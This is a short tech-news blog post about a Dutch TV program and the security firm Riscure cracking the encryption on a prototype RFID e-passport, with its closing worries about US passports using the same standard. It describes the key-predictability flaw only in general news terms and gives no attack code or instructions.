A Dutch television program "Nieuwslicht" recently worked with local security firm Riscure to successfully crack and decrypt a Dutch-prototype RFID passport. In this case, the data exchange between the RFID reader and passport was intercepted, stored, and then the password was cracked later in just 2 hours on a PC giving full access to the digitized fingerprint, photograph, and all other encrypted and plain text data on the RFID tag -- just perfect for slapping together a cloned passport, eh? The flaw, at least in part, is due to the algorithm used when generating the secret key to protect the data. The key turns out to be predictable given that it is sequentially issued and constructed from the passport expiry date, birth date, passport number, and checksum. But don't kick back in superior isolationism just yet kid. Starting October 2006 the US will issue all new passports using the same ISO 14443 RFID tag and Basic Access Control encryption scheme employed by the Dutch e-passports (and others) and adopted by the ICAO as global standards. It's still not clear at what distance the exchange was intercepted -- while the passive ISO 14443 tag is spec'd with a read distance of only 2-milimeters you'll find claims of reads at several meters. This is important 'cause the greater the read distance in say, the line at airport immigration control, the greater the chance of abuse. Regardless, the Dutch e-passport system is still under development allowing for changes, which makes us wonder, is ours? Wouldn't be the first time we've abandoned RFID passport plans due to technology concerns.
[Via The Register and Vara (Dutch), Thanks